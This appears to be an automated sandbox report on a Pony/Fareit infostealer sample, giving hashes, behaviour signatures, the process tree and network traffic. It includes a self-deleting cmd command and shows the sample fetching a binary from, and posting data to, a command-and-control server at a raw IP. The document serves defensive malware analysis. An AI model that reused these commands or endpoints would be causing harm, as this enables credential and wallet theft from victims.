Analysis

  • max time kernel
    69s
  • max time network
    73s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    07/07/2020, 12:10 UTC

General

  • Target

    fb30601d90268e316d5bbbe9e78bc1ad8acb4fe262d66b0a3f403425ad78f15b.exe

  • Size

    1.1MB

  • MD5

    32b2c85efdbb016ad3c04fd3e4ff4cee

  • SHA1

    828f0f32aca9eb4d144029919b0dac48ae34de1c

  • SHA256

    fb30601d90268e316d5bbbe9e78bc1ad8acb4fe262d66b0a3f403425ad78f15b

  • SHA512

    502e9c133d03cc01aa98a348eb46cea69fdd7e2b66ab759d54cc625779a052e89924a805bcf5a3a3954808b460f5297e2e9efb9f84fc675d57dd72ca62edb83b

Malware Config

Signatures

  • Suspicious use of WriteProcessMemory 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 40 IoCs
  • Accesses cryptocurrency wallets, possible credential harvesting 2 TTPs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks for installed software on the system 1 TTPs 7 IoCs
  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

Processes

  • C:\Users\Admin\AppData\Local\Temp\fb30601d90268e316d5bbbe9e78bc1ad8acb4fe262d66b0a3f403425ad78f15b.exe
    "C:\Users\Admin\AppData\Local\Temp\fb30601d90268e316d5bbbe9e78bc1ad8acb4fe262d66b0a3f403425ad78f15b.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3068
    • C:\Users\Admin\AppData\Local\Temp\fb30601d90268e316d5bbbe9e78bc1ad8acb4fe262d66b0a3f403425ad78f15b.exe
      C:\Users\Admin\AppData\Local\Temp\fb30601d90268e316d5bbbe9e78bc1ad8acb4fe262d66b0a3f403425ad78f15b.exe dfsr
      2⤵
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Checks for installed software on the system
      PID:3864
      • C:\Windows\SYSTEM32\cmd.exe
        cmd.exe /c ping 127.0.0.1 & del /F /Q "C:\Users\Admin\AppData\Local\Temp\fb30601d90268e316d5bbbe9e78bc1ad8acb4fe262d66b0a3f403425ad78f15b.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3600
        • C:\Windows\system32\PING.EXE
          ping 127.0.0.1
          4⤵
          • Runs ping.exe
          PID:3372

Network

  • flag-unknown
    DNS
    blockchain.info
    Remote address:
    8.8.8.8:53
    Request
    blockchain.info
    IN A
    Response
    blockchain.info
    IN A
    104.16.55.3
    blockchain.info
    IN A
    104.16.54.3
  • flag-unknown
    GET
    https://blockchain.info/rawaddr/1BkeGqpo8M5KNVYXW3obmQt1R58zXAqLBQ
    fb30601d90268e316d5bbbe9e78bc1ad8acb4fe262d66b0a3f403425ad78f15b.exe
    Remote address:
    104.16.55.3:443
    Request
    GET /rawaddr/1BkeGqpo8M5KNVYXW3obmQt1R58zXAqLBQ HTTP/1.1
    If-None-Match: f64e026e
    User-Agent: WinHttp.WinHttpRequest.5.1
    Host: blockchain.info
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Tue, 07 Jul 2020 12:10:47 GMT
    Content-Type: application/json;charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: __cfduid=d4962dd4b56b0b49afac89e23f544cd5a1594123847; expires=Thu, 06-Aug-20 12:10:47 GMT; path=/; domain=.blockchain.info; HttpOnly; SameSite=Lax
    content-language: en
    content-security-policy: img-src 'self' data: https://blockchain.info *.blockchain.info https://s0.2mdn.net https://cdn4.buysellads.net https://pagead2.googlesyndication.com https://pagead2.googlesyndication.com.br https://pagead2.googlesyndication.cn https://pagead2.googlesyndication.de https://pagead2.googlesyndication.co.id https://pagead2.googlesyndication.co.in https://pagead2.googlesyndication.com.ng https://pagead2.googlesyndication.nl https://pagead2.googlesyndication.ru https://pagead2.googlesyndication.co.uk https://tpc.googlesyndication.com https://tpc.googlesyndication.com.br https://tpc.googlesyndication.cn https://tpc.googlesyndication.de https://tpc.googlesyndication.co.id https://tpc.googlesyndication.co.in https://tpc.googlesyndication.com.ng https://tpc.googlesyndication.nl https://tpc.googlesyndication.ru https://tpc.googlesyndication.co.uk https://www.google-analytics.com https://www.google-analytics.com.br https://www.google-analytics.cn https://www.google-analytics.de https://www.google-analytics.co.id https://www.google-analytics.co.in https://www.google-analytics.com.ng https://www.google-analytics.nl https://www.google-analytics.ru https://www.google-analytics.co.uk https://tpc.googlesyndication.com https://tpc.googlesyndication.com.br https://tpc.googlesyndication.cn https://tpc.googlesyndication.de https://tpc.googlesyndication.co.id https://tpc.googlesyndication.co.in https://tpc.googlesyndication.com.ng https://tpc.googlesyndication.nl https://tpc.googlesyndication.ru https://tpc.googlesyndication.co.uk https://www.google.com https://www.google.com.br https://www.google.cn https://www.google.de https://www.google.co.id https://www.google.co.in https://www.google.com.ng https://www.google.nl https://www.google.ru https://www.google.co.uk https://stats.g.doubleclick.net https://securepubads.g.doubleclick.net; style-src 'self' 'unsafe-inline'; frame-src 'self' https://tpc.googlesyndication.com https://tpc.googlesyndication.com.br 
https://tpc.googlesyndication.cn https://tpc.googlesyndication.de https://tpc.googlesyndication.co.id https://tpc.googlesyndication.co.in https://tpc.googlesyndication.com.ng https://tpc.googlesyndication.nl https://tpc.googlesyndication.ru https://tpc.googlesyndication.co.uk ; child-src 'self' https://tpc.googlesyndication.com https://tpc.googlesyndication.com.br https://tpc.googlesyndication.cn https://tpc.googlesyndication.de https://tpc.googlesyndication.co.id https://tpc.googlesyndication.co.in https://tpc.googlesyndication.com.ng https://tpc.googlesyndication.nl https://tpc.googlesyndication.ru https://tpc.googlesyndication.co.uk ; script-src 'self' 'sha256-nnpbmI6DKHRe+knaMsPTXncz9jvCdT0AsKfHsAnPjpY=' 'sha256-gl5QXlsJYl7qV85/u6oyEmNFrjPNkcBWeqS/KjYflKY=' https://srv.buysellads.com https://c.amazon-adsystem.com https://www.google-analytics.com https://www.google-analytics.com.br https://www.google-analytics.cn https://www.google-analytics.de https://www.google-analytics.co.id https://www.google-analytics.co.in https://www.google-analytics.com.ng https://www.google-analytics.nl https://www.google-analytics.ru https://www.google-analytics.co.uk https://www.googletagservices.com https://www.googletagservices.com.br https://www.googletagservices.cn https://www.googletagservices.de https://www.googletagservices.co.id https://www.googletagservices.co.in https://www.googletagservices.com.ng https://www.googletagservices.nl https://www.googletagservices.ru https://www.googletagservices.co.uk https://adservice.google.com https://adservice.google.com.br https://adservice.google.cn https://adservice.google.de https://adservice.google.co.id https://adservice.google.co.in https://adservice.google.com.ng https://adservice.google.nl https://adservice.google.ru https://adservice.google.co.uk https://pagead2.googlesyndication.com https://pagead2.googlesyndication.com.br https://pagead2.googlesyndication.cn https://pagead2.googlesyndication.de 
https://pagead2.googlesyndication.co.id https://pagead2.googlesyndication.co.in https://pagead2.googlesyndication.com.ng https://pagead2.googlesyndication.nl https://pagead2.googlesyndication.ru https://pagead2.googlesyndication.co.uk https://securepubads.g.doubleclick.net https://cdn.ampproject.org; connect-src 'self' *.blockchain.info wss://*.blockchain.info https://blockchain.info wss://ws.blockchain.info https://www.google-analytics.com https://www.google-analytics.com.br https://www.google-analytics.cn https://www.google-analytics.de https://www.google-analytics.co.id https://www.google-analytics.co.in https://www.google-analytics.com.ng https://www.google-analytics.nl https://www.google-analytics.ru https://www.google-analytics.co.uk https://stats.g.doubleclick.net https://securepubads.g.doubleclick.net; object-src 'none'; media-src 'none'; font-src 'self'; worker-src 'none';
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    vary: Accept-Encoding
    x-blockchain-application: explorer-bitcoin-core
    x-blockchain-cp-b: explorer-bitcoin-core
    x-blockchain-ms: true
    x-blockchainn-cp-b: 0d18b5191775
    x-frame-options: SAMEORIGIN
    x-cache-status: MISS 6205b60c039fd2b64c7a6883c4bacb9b
    x-blockchain-language: en
    x-blockchain-language-id: 0:0:0 (en:en:en)
    x-request-id: b826b9af9f9ed0ceb6c82b6fbe61430b
    x-original-host: blockchain.info
    x-blockchain-server: BlockchainFE/1.0
    x-blockchain-cp-f: zt1g 0.113 - b826b9af9f9ed0ceb6c82b6fbe61430b
    x-content-type-options: nosniff
    x-xss-protection: 1; mode=block
    Via: 1.1 google
    CF-Cache-Status: DYNAMIC
    cf-request-id: 03cac89eb00000bf37adabd200000001
    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
    Server: cloudflare
    CF-RAY: 5af176ddebf1bf37-AMS
  • flag-unknown
    GET
    http://45.61.136.126/viewtopic.php?c790=0&a570=41646d696e&b550474f484353464242
    fb30601d90268e316d5bbbe9e78bc1ad8acb4fe262d66b0a3f403425ad78f15b.exe
    Remote address:
    45.61.136.126:80
    Request
    GET /viewtopic.php?c790=0&a570=41646d696e&b550474f484353464242 HTTP/1.1
    If-None-Match: f64e026e
    User-Agent: WinHttp.WinHttpRequest.5.1
    Host: 45.61.136.126
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 07 Jul 2020 12:11:01 GMT
    Content-Type: application/octet-stream
    Transfer-Encoding: chunked
    Connection: keep-alive
    Last-Modified: Fri, 01 Jan 1990 00:00:00 GMT
    Expires: Fri, 01 Jan 1990 00:00:00 GMT
    Cache-control: must-revalidate, no-store, no-cache, max-age=0, post-check=0, pre-check=0
    Pragma: no-cache
    Content-Transfer-Encoding: binary
  • flag-unknown
    POST
    http://45.61.136.126/p/z05857687.php
    fb30601d90268e316d5bbbe9e78bc1ad8acb4fe262d66b0a3f403425ad78f15b.exe
    Remote address:
    45.61.136.126:80
    Request
    POST /p/z05857687.php HTTP/1.0
    Host: 45.61.136.126
    Accept: */*
    Accept-Encoding: identity, *;q=0
    Accept-Language: en-US
    Content-Length: 169
    Content-Type: application/octet-stream
    Connection: close
    Content-Encoding: binary
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 07 Jul 2020 12:11:03 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: close
  • 104.16.55.3:443
    https://blockchain.info/rawaddr/1BkeGqpo8M5KNVYXW3obmQt1R58zXAqLBQ
    tls, http
    fb30601d90268e316d5bbbe9e78bc1ad8acb4fe262d66b0a3f403425ad78f15b.exe
    5.1kB
    134.6kB
    100
    98

    HTTP Request

    GET https://blockchain.info/rawaddr/1BkeGqpo8M5KNVYXW3obmQt1R58zXAqLBQ

    HTTP Response

    200
  • 45.61.136.126:80
    http://45.61.136.126/viewtopic.php?c790=0&a570=41646d696e&b550474f484353464242
    http
    fb30601d90268e316d5bbbe9e78bc1ad8acb4fe262d66b0a3f403425ad78f15b.exe
    3.7kB
    103.0kB
    77
    75

    HTTP Request

    GET http://45.61.136.126/viewtopic.php?c790=0&a570=41646d696e&b550474f484353464242

    HTTP Response

    200
  • 45.61.136.126:80
    http://45.61.136.126/p/z05857687.php
    http
    fb30601d90268e316d5bbbe9e78bc1ad8acb4fe262d66b0a3f403425ad78f15b.exe
    835 B
    403 B
    6
    6

    HTTP Request

    POST http://45.61.136.126/p/z05857687.php

    HTTP Response

    200
  • 127.0.0.1:47001
  • 10.10.0.255:138
    netbios-dgm
    2.2kB
    10
  • 8.8.8.8:53
    blockchain.info
    dns
    61 B
    93 B
    1
    1

    DNS Request

    blockchain.info

    DNS Response

    104.16.55.3
    104.16.54.3

  • 10.10.0.255:137
    netbios-ns
    798 B
    10
  • 10.10.0.34:137
    netbios-ns
    90 B
    1
  • 239.255.255.250:1900
    1.3kB
    8
  • 239.255.255.250:1900
  • 10.10.0.38:137
    netbios-ns
    270 B
    3
  • 10.10.0.22:137
    netbios-ns
    270 B
    3
  • 10.10.0.41:137
    netbios-ns
    270 B
    3

MITRE ATT&CK Enterprise v6

Downloads

  • memory/3864-1-0x0000000002FF0000-0x000000000300C000-memory.dmp

    Filesize

    112KB
